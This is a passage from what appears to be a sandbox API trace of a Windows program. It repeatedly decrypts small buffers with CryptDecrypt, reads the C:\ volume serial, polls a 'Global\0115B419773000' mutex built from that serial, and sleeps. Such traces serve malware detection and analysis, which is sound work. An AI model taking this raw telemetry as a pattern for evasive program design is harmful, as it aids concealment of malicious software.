Size=0x174) returned 0x2a69320 [0044.585] GetLastError () returned 0x0 [0044.586] RtlReAllocateHeap (Heap=0x2a60000, Flags=0x0, Ptr=0x2a64848, Size=0x92) returned 0x2a696c8 [0044.586] GetLastError () returned 0x0 [0044.587] WaitForSingleObject (hHandle=0x298, dwMilliseconds=0xffffffff) Thread: id = 2 os_tid = 0xa88 Thread: id = 3 os_tid = 0xf64 [0034.476] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a611f0 [0034.476] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf58e28) returned 1 [0034.476] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0034.476] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298f9d0 | out: pbData=0x2a611f0, pdwDataLen=0x298f9d0) returned 1 [0034.476] CryptDestroyKey (hKey=0xf58e28) returned 1 [0034.476] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61218 [0034.476] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61240 [0034.476] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61268 [0034.476] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf590a8) returned 1 [0034.476] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0034.476] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61268, pdwDataLen=0x298f9a8 | out: pbData=0x2a61268, pdwDataLen=0x298f9a8) returned 1 [0034.476] CryptDestroyKey (hKey=0xf590a8) returned 1 [0034.476] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61268 | out: hHeap=0x2a60000) returned 1 [0034.476] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0034.476] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61240 | out: hHeap=0x2a60000) returned 1 [0034.476] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0034.476] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0034.476] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0034.476] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0034.476] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf58e68) returned 1 [0034.477] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0034.477] CryptDecrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298fa04 | out: pbData=0x2a611f0, pdwDataLen=0x298fa04) returned 1 [0034.477] CryptDestroyKey (hKey=0xf58e68) returned 1 [0034.477] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61238 [0034.477] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x0 [0034.477] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773000") returned 0x21c [0034.477] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x0) returned 0x0 [0034.477] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0034.477] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0034.477] ReleaseMutex (hMutex=0x21c) returned 1 [0034.477] CloseHandle (hObject=0x21c) returned 1 [0034.477] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x9b1ffe, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x21c [0034.477] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a611f0 [0034.477] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf58e28) returned 1 [0034.477] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0034.477] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298f9d0 | out: pbData=0x2a611f0, pdwDataLen=0x298f9d0) returned 1 [0034.477] CryptDestroyKey (hKey=0xf58e28) returned 1 [0034.478] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61218 [0034.478] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61240 [0034.478] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61268 [0034.478] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf590a8) returned 1 [0034.478] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0034.478] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61268, pdwDataLen=0x298f9a8 | out: pbData=0x2a61268, pdwDataLen=0x298f9a8) returned 1 [0034.478] CryptDestroyKey (hKey=0xf590a8) returned 1 [0034.478] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61268 | out: hHeap=0x2a60000) returned 1 [0034.478] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0034.478] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61240 | out: hHeap=0x2a60000) returned 1 [0034.478] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0034.478] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0034.478] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0034.478] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0034.478] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf59168) returned 1 [0034.478] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0034.478] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298fa04 | out: pbData=0x2a611f0, pdwDataLen=0x298fa04) returned 1 [0034.478] CryptDestroyKey (hKey=0xf59168) returned 1 [0034.478] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61238 [0034.478] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x0 [0034.478] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\0115B419773000") returned 0x220 [0034.478] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x0) returned 0x0 [0034.478] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0034.478] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0034.478] ReleaseMutex (hMutex=0x220) returned 1 [0034.478] CloseHandle (hObject=0x220) returned 1 [0034.478] Sleep (dwMilliseconds=0x3e8) [0035.497] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a611f0 [0035.497] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf59168) returned 1 [0035.497] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0035.497] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298f9d0 | out: pbData=0x2a611f0, pdwDataLen=0x298f9d0) returned 1 [0035.498] CryptDestroyKey (hKey=0xf59168) returned 1 [0035.498] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61218 [0035.498] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61240 [0035.498] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61268 [0035.498] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf590a8) returned 1 [0035.498] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0035.498] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61268, pdwDataLen=0x298f9a8 | out: pbData=0x2a61268, pdwDataLen=0x298f9a8) returned 1 [0035.498] CryptDestroyKey (hKey=0xf590a8) returned 1 [0035.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61268 | out: hHeap=0x2a60000) returned 1 [0035.498] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0035.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61240 | out: hHeap=0x2a60000) returned 1 [0035.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0035.498] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0035.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0035.498] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0035.498] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf58ce8) returned 1 [0035.498] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0035.498] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298fa04 | out: pbData=0x2a611f0, pdwDataLen=0x298fa04) returned 1 [0035.498] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0035.498] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61238 [0035.498] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x220 [0035.498] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x0) returned 0x102 [0035.498] CloseHandle (hObject=0x220) returned 1 [0035.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0035.498] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0035.499] Sleep (dwMilliseconds=0x3e8) [0036.525] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a611f0 [0036.525] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf58e68) returned 1 [0036.525] CryptSetKeyParam (hKey=0xf58e68, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0036.525] CryptDecrypt (in: hKey=0xf58e68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298f9d0 | out: pbData=0x2a611f0, pdwDataLen=0x298f9d0) returned 1 [0036.525] CryptDestroyKey (hKey=0xf58e68) returned 1 [0036.525] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61218 [0036.525] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61240 [0036.525] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61268 [0036.525] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf58e28) returned 1 [0036.525] CryptSetKeyParam (hKey=0xf58e28, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0036.525] CryptDecrypt (in: hKey=0xf58e28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61268, pdwDataLen=0x298f9a8 | out: pbData=0x2a61268, pdwDataLen=0x298f9a8) returned 1 [0036.525] CryptDestroyKey (hKey=0xf58e28) returned 1 [0036.525] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61268 | out: hHeap=0x2a60000) returned 1 [0036.525] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0036.525] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61240 | out: hHeap=0x2a60000) returned 1 [0036.525] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0036.525] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0036.526] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0036.526] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0036.526] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf590a8) returned 1 [0036.526] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0036.526] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298fa04 | out: pbData=0x2a611f0, pdwDataLen=0x298fa04) returned 1 [0036.526] CryptDestroyKey (hKey=0xf590a8) returned 1 [0036.526] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61238 [0036.526] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x220 [0036.526] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x0) returned 0x102 [0036.526] CloseHandle (hObject=0x220) returned 1 [0036.526] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0036.526] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0036.526] Sleep (dwMilliseconds=0x3e8) [0037.547] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a611f0 [0037.547] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf58ce8) returned 1 [0037.547] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0037.547] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298f9d0 | out: pbData=0x2a611f0, pdwDataLen=0x298f9d0) returned 1 [0037.547] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0037.547] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61218 [0037.547] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61240 [0037.547] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61268 [0037.547] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf59168) returned 1 [0037.547] CryptSetKeyParam (hKey=0xf59168, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0037.547] CryptDecrypt (in: hKey=0xf59168, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61268, pdwDataLen=0x298f9a8 | out: pbData=0x2a61268, pdwDataLen=0x298f9a8) returned 1 [0037.547] CryptDestroyKey (hKey=0xf59168) returned 1 [0037.547] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61268 | out: hHeap=0x2a60000) returned 1 [0037.547] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0037.547] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61240 | out: hHeap=0x2a60000) returned 1 [0037.547] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0037.547] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0037.547] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0037.547] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0037.547] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf58ce8) returned 1 [0037.547] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0037.548] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298fa04 | out: pbData=0x2a611f0, pdwDataLen=0x298fa04) returned 1 [0037.548] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0037.548] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61238 [0037.548] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x220 [0037.548] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x0) returned 0x102 [0037.548] CloseHandle (hObject=0x220) returned 1 [0037.548] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0037.548] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0037.548] Sleep (dwMilliseconds=0x3e8) [0038.553] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a611f0 [0038.553] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf58ce8) returned 1 [0038.553] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0038.553] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298f9d0 | out: pbData=0x2a611f0, pdwDataLen=0x298f9d0) returned 1 [0038.553] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0038.553] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61218 [0038.553] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61240 [0038.553] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a61268 [0038.553] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf590a8) returned 1 [0038.553] CryptSetKeyParam (hKey=0xf590a8, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0038.553] CryptDecrypt (in: hKey=0xf590a8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61268, pdwDataLen=0x298f9a8 | out: pbData=0x2a61268, pdwDataLen=0x298f9a8) returned 1 [0038.553] CryptDestroyKey (hKey=0xf590a8) returned 1 [0038.553] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61268 | out: hHeap=0x2a60000) returned 1 [0038.553] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61218, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0038.553] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61240 | out: hHeap=0x2a60000) returned 1 [0038.553] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0038.553] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0038.553] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61218 | out: hHeap=0x2a60000) returned 1 [0038.553] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x40) returned 0x2a611f0 [0038.553] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9e8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa50 | out: phKey=0x298fa50*=0xf58ce8) returned 1 [0038.553] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x298fa38, dwFlags=0x0) returned 1 [0038.553] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a611f0, pdwDataLen=0x298fa04 | out: pbData=0x2a611f0, pdwDataLen=0x298fa04) returned 1 [0038.553] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0038.553] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x34) returned 0x2a61238 [0038.554] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773000") returned 0x220 [0038.554] WaitForSingleObject (hHandle=0x220, dwMilliseconds=0x0) returned 0x102 [0038.554] CloseHandle (hObject=0x220) returned 1 [0038.554] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a611f0 | out: hHeap=0x2a60000) returned 1 [0038.554] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61238 | out: hHeap=0x2a60000) returned 1 [0038.554] Sleep (dwMilliseconds=0x3e8) [0039.789] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x20) returned 0x2a61258 [0039.789] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f9b4, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298fa1c | out: phKey=0x298fa1c*=0xf58ee8) returned 1 [0039.789] CryptSetKeyParam (hKey=0xf58ee8, dwParam=0x1, pbData=0x298fa04, dwFlags=0x0) returned 1 [0039.789] CryptDecrypt (in: hKey=0xf58ee8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a61258, pdwDataLen=0x298f9d0 | out: pbData=0x2a61258, pdwDataLen=0x298f9d0) returned 1 [0039.789] CryptDestroyKey (hKey=0xf58ee8) returned 1 [0039.789] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x8, Size=0x1e) returned 0x2a61280 [0039.789] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x1e) returned 0x2a61498 [0039.789] RtlAllocateHeap (HeapHandle=0x2a60000, Flags=0x0, Size=0x90) returned 0x2a643e0 [0039.789] CryptImportKey (in: hProv=0xf466e8, pbData=0x298f98c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x298f9f4 | out: phKey=0x298f9f4*=0xf58ce8) returned 1 [0039.789] CryptSetKeyParam (hKey=0xf58ce8, dwParam=0x1, pbData=0x298f9dc, dwFlags=0x0) returned 1 [0039.789] CryptDecrypt (in: hKey=0xf58ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2a643e0, pdwDataLen=0x298f9a8 | out: pbData=0x2a643e0, pdwDataLen=0x298f9a8) returned 1 [0039.789] CryptDestroyKey (hKey=0xf58ce8) returned 1 [0039.789] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a643e0 | out: hHeap=0x2a60000) returned 1 [0039.789] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2a61280, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0039.789] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61498 | out: hHeap=0x2a60000) returned 1 [0039.789] HeapFree (in: hHeap=0x2a60000, dwFlags=0x0, lpMem=0x2a61258 | out: hHeap=0x2a60000) returned 1 [0039.789] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x298fa5c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x298fa5c*=0xb4197730, 